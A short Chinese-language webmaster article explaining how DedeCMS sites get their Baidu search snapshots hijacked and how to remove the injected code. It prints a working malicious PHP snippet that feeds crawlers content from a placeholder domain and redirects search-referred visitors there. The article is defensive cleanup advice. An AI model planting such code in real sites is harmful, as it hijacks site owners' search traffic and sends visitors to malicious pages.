織夢百度快照劫持注入代碼防范及清除,很多站長做站的過程中,都碰過百度快照被劫持等問題,明明已經修復模板文件了,還是沒有更新回正常的快照,以織夢系統為例,
往往根目錄/index.php也被植入惡意代碼
比如:
<?phpif(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']);foreach ($domain as $v) { if (strpos($fromurl,$v)!==false){ $target="http://域名.com/index.html"; header("Location:".$target); exit; }}?> |
單這段代碼就直接把搜索引擎蜘蛛搞暈,帶到別的惡意網址去。
把其刪掉,如果在index.php里沒找到,但還是存在類似的問題,可以用dw全站搜索下。
關于防范,空間,ftp賬號,權限,后臺賬號之類都需要設置下,不能太過簡單,可以看相關教程《織夢dedecms做到這幾條安全設置,網站安全達到99%》
